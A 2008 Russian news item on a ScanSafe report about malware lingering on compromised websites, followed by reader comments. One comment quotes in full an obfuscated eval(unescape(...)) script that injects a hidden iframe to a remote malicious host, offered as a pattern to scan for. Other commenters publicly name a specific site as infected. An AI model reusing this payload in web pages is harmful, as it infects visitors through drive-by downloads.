ScanSafe: Вредоносное ПО "живет" на сайтах дольше

image

Теги: вредоносное ПО, вирус, троян, шпионское ПО

По данным ИБ-компании ScanSafe, некоторые зараженные сайты «не вылечиваются» в течение двух месяцев после компрометации.

По данным ИБ-компании ScanSafe, некоторые зараженные сайты «не вылечиваются» в течение двух месяцев после компрометации.

Ежегодный доклад ScanSafe (Annual Global Threat report), опубликованный сегодня, показал, что веб-угрозы, включая вирусы, трояны и шпионское ПО, становятся все более распространенными, причем таких программ в Сети во второй половине 2007 г. стало на 61% больше.

Время жизни вредоносных программ, обнаруженных вирусными сканерами, во второй половине 2007 г. на веб-хостингах возросло. Вирусы «проживают» на зараженных сайтах в среднем по 29 дней, то есть на 62% дольше, чем в первой половине 2007 г.

Недетектируемое вредоносное ПО живет еще дольше – порядка 61 дня со времени компрометации сайта.


или введите имя

CAPTCHA
1
02-04-2008 04:23:54
Знаю один сайт, где внизу страницы javascript грузящий вирусню, админы в курсе. Говорят - мы знаем, но как только убираем, через некоторое время ЭТО снова появляется! о_О
0 |
1
02-04-2008 04:26:18
PS Контора занимается электронным документоообором через интернет, с применением криптографии. о_О
0 |
1
02-04-2008 04:59:36
Ога тоже есть один сайт с Trojan.JS.Agent.i уже 7 месяцев там болтается. Админы вкурсе, но отмаза шикарная у них "nod не видит, значит ничего нет" lol
0 |
1
02-04-2008 07:56:29
Бывает. И часто. Просто парни про***ли пароль хостовый. Как только поменяют пароли на FTP эта шняга сразу исчезнет. Так им и передай. И пусть надежней хранят пассы на не в общем доступе локала. И проверят свои компы на вирусню.. А то опять javascript появитцо
0 |
1
02-04-2008 11:41:14
А я то уж искать начал дырки в сайте =)
0 |
1
02-04-2008 09:29:40
была у меня такая беда, нужно комп от вирей пролечить и пароли на ftp поменять. вирь ворует пароли из тотал коммандера.
0 |
1
02-04-2008 16:04:01
А есть какие-нибудь средства автоматического мониторинга сайта на вирусы?
0 |
1
03-04-2008 03:54:16
Да не все руты лохи.. Кто-то под шумок...)
0 |
1
03-04-2008 07:18:20
Не ну можно конечнои автоматику написать самому скриптовую. Вообще эта зараза инфицырует либо наглушняк девейсит index файла. Пох какие... После кода просто идет дозапись: eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%63%6e%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%36%33%36%38%29%2b%27%33%62%31%32%61%33%65%61%5c%27%20%77%69%64%74%68%3d%35%38%34%20%68%65%69%67%68%74%3d%33%30%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Хочешь пиши скрипт. Запускай кроном и проверяй индекс файлы на наличие вот такой вот беды. В принципе элементарно.
0 |
1
03-04-2008 07:32:29
Да... К стати IP FTP доступа в логах видно. Можешь посмотреть откуда дозаписывается тебе это все. Но только там их много обычно бывает. А то что вирь ворует пассы из Тотала далеко не факт. Скорее сканирует текстовые файлы на зараженной машине. Хотя все может быть.
0 |
1
04-04-2008 17:31:49
А что скрывать то этот сайт где вирусня сидит. Я так понимаю это www.crypta.ru. Эти биип пытаются еще заниматься защитой информации да еще под эгидой налоговой. Админа этой конторы надо увольнять. Лох он ... Служба безопасности у них тоже похоже курит бамбук.. В общем страна должна знать своих героев.
0 |
1
04-04-2008 18:34:41
Кстати статья за распространение вредносного ПО не отменена. Это к сведениям админов сайта www.crypta.ru.
0 |